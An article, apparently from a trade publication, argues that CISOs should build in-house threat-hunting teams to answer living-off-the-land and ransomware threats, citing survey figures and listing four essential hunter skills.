The cybersecurity talent gap is nothing new, and it’s not going away anytime soon. The global shortage — the difference between the number of current workers and that required to adequately protect the world’s organizations — has grown to 4.8 million, up from 3.4 million in 2022.
But the problem goes far beyond simply finding and hiring people given the increasingly complex landscape: Advanced persistent threat (APT) groups and extremely formidable ransomware cybercriminals are constantly changing their behaviors to avoid getting discovered, so they have all the time they need to compromise networks. Difficult-to-detect living off the land (LOTL) exploits — in which these criminals manipulate legitimate, built-in system tools to “blend into” routine network activity and execute code — has emerged as the top tactic for nation-state adversaries, now accounting for 75.6 percent of their attacks, according to the SANS 2025 Threat Hunting Survey. In addition, LOTL is linked to 49 percent of ransomware and 44.5 percent of financially motivated industrial-espionage incidents.
This trend, along with rising geopolitical tension, an ever-pervasive and complicated regulatory environment and calls for more proactive cyber risk management, has elevated network defense into a leading board priority.
Worse Threats Need Better Hunters
That’s why modern chief information security officers (CISOs) are increasingly focused on bringing in highly qualified, behavioral threat-hunting experts as part of their teams. By leveraging intelligence to analyze user activity and anomalous patterns, threat hunters thwart attacks which often evade automated detection tools. They’re also adept at conducting formalized and repeated search processes for adversarial tactics, techniques and procedures (TTPs) that represent significant risks.
Frankly, CISOs must recruit threat hunters who are several cuts above their standard cybersecurity peers, just as the military and law enforcement communities depend upon members with elite skills to perform in special units.
Amid the growing demand for this caliber of professional, we’re also seeing notable changes in staffing patterns, with 58 percent of organizations managing threat hunting internally, up from 46 percent a year ago. In fact, less than a third of companies fully outsource their threat hunting, down from 37 percent in 2024.
This puts more pressure on CISOs to land the right talent. Sure, they can invest in artificial intelligence (AI) to handle various duties. But AI alone cannot compete with people in acquiring deep knowledge of an organization’s structure while interpreting system, tool and human behaviors in different contexts throughout host, network and cloud environments. Threat hunting requires industry-specific expertise and a total understanding of the organization’s security process and controls, along with the privileged access, network access, architecture, applications, defense technologies and incident response functions.
What Skills Should Your Cybersecurity Team Have?
In addition to this, what essential skills should CISOs seek in recruiting in-house threat-hunters? We recommend the following four.
4 Essential Skills for Cyber Threat Hunters
- An offensive mindset.
- Security architecture savvy.
- Data analysis skills.
- Organizational and core systems knowledge.
An Offensive Mindset
Threat hunting, by definition, requires assertive, proactive team members who take pride in mastering the key details about how attackers use systems and bypass controls. As a result, they know where to find threats and what options they can use to stop them in their tracks.
Security Architecture Savvy
This is all about acquiring deep knowledge and understanding how to use it. Threat hunters need to have deep knowledge about the organization’s architecture, networks and security controls in order to spot unusual behaviors.
Data Analysis Skills
Data analysis plays a critical role in identifying patterns and anomalies from vast data sets of endpoint and network logs. This skill helps threat hunters navigate extensive data sets and results to identify maliciousness from normal activity.
Organizational and Core Systems Knowledge
A long-time industry veteran can prove useful here, especially someone who may have built the very technologies that the team is defending. This skill set is fostered over time through proactive threat hunting and develops as hunters are exploring organizational logging and visibility.
Step Up Your Threat Hunting
Let’s face it: The bad guys are going to keep stepping up their game. They’re always looking for the next exploitable entryway, and will deploy AI and additional, high-powered tools to more efficiently and effectively weaponize their schemes.
In response, CISOs need more than just good technicians. They must assemble a collection of in-house talent which combines the deep knowledge of an obsessed researcher with the proactive cunning of a relentless bounty hunter. That’s when a cyber team transforms into a Special Forces/SWAT-level A Team.
